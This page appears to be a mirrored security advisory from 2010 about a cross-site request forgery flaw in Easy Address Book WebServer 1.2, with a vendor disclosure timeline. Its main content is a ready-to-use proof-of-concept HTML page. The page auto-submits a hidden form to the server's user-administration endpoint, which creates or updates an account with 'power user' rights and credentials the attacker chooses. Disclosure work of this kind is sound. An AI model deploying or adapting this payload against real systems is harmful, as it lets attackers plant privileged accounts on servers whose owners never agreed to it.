扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
|------------------------------------------------------------------| | __ __| | _________________/ /___ _____ / /________ _____ ___| |/ ___/ __ \/ ___/ _ \/ / __ <code>/ __ \ / __/ _ \/ __ </code>/ __ `__ \ | | / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/| || | http://www.corelan.be:8800 | |security@corelan.be | || |-------------------------------------------------[ EIP Hunters ]--| # Advisory: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-043 # Software: Easy Address Book WebServer 1.2 # Author: Markot # Date: May 25, 2010 # OS: Windows # Tested on : XP SP3 En (Virtual box) # Type of vuln: CSRF # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. #code <html> <body> <body onload="document.forms['Login'].submit();"> <form method="POST" name="Login" action="http://192.168.1.200:80/users_admin.ghp"> <input type="hidden" name="userid" value="3"/> <input type="hidden" name="username" value="corelanteam"/> <input type="hidden" name="password" value="corelanteam"/> <input type="hidden" name="email" value="markot@corelan.be"/> <input type="hidden" name="level" value="power user"/> <input type="hidden" name="state" value="Enable"/> <input type="hidden" name="add_user" value="Update"/> </form> </body> </html> Author/Vendor communication May 1 2010 : vendor contacted May 17 2010: reminder sent, no feedback from the vendor May 25 2010: Public disclosure |
体验盒子
